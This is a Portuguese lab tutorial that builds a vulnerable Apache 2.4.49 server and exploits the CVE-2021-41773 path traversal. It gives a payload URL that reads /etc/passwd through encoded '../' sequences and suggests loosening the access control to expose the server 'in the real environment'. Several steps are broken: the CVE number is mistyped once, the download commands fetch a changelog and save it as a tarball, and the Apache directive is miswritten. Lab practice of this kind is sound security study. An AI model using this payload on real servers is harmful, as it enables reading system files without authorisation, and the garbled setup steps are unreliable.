
Tutorial passo a passo demonstrando como configurar um ambiente Apache 2.4.49 vulnerável e explorar CVE-2021-41773 path traversal usando Kali Linux e Ubuntu Server VMs.
este é um exemplo prático de como explorar a vulnerabilidade CVE-2021-4773 com uma máquina virtual
para este tutorial você precisa do seguinte
então vamos começar quando você tiver 2 máquinas virtuais em execução, instalará o apache versão 2.4.49 com um repositório de arquivos você pode encontrar esta versão em https://archive.apache.org/dist/httpd/CHANGES_2.4.49
1 na primeira vez em sua máquina virtual servidor, execute o seguinte comando
curl -k -L -s --compressed https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2 ou wget https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2
2 na segunda vez, você precisa descompactar esta versão do apache assim
tar -xvjf httpd-2.4.49.tar.bz2
3 instale o seguinte pacote
sudo apt install build-essential libpcre3 libpcre3-dev libapr1-dev libaprutil1-dev libssl-dev
4 execute o arquivo executável no diretório principal (arquivo configure) use a flag para especificar o diretório de instalação
./configure --prefix=/usr/local/apache2
5 compile a versão vulnerável
make
6 instale a versão vulnerável
make install
7 verifique a versão
ls /usr/local/apache2
8 inicie o processo
/usr/local/apache2/bin/apachectl start
9 verifique o processo
ps aux | grep httpd
10 configure a vulnerabilidade encontre o arquivo /usr/local/apache2/conf/httpd.conf e configure o diretório admin encontre a tag directory e altere Require all denied para
Required all granted
encontre a tag Files .ht* Required all denied para
Required all granted
a primeira alteração é para explorar a vulnerabilidade no ambiente local e a segunda é para expor no ambiente real
1 escaneie o endereço ip com nmap com o seguinte comando
nmap -sV ip_address
2 faça um curl ou get para testar o servidor apache
curl ip_address ou faça wget ip_address
3 veja como explorar a vulnerabilidade na próxima página se quiser entender a sintaxe
https://www.picussecurity.com/resource/blog/simulate-apache-cve-2021-41773-exploits-vulnerability
ou apenas use o seguinte payload
http://$host/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd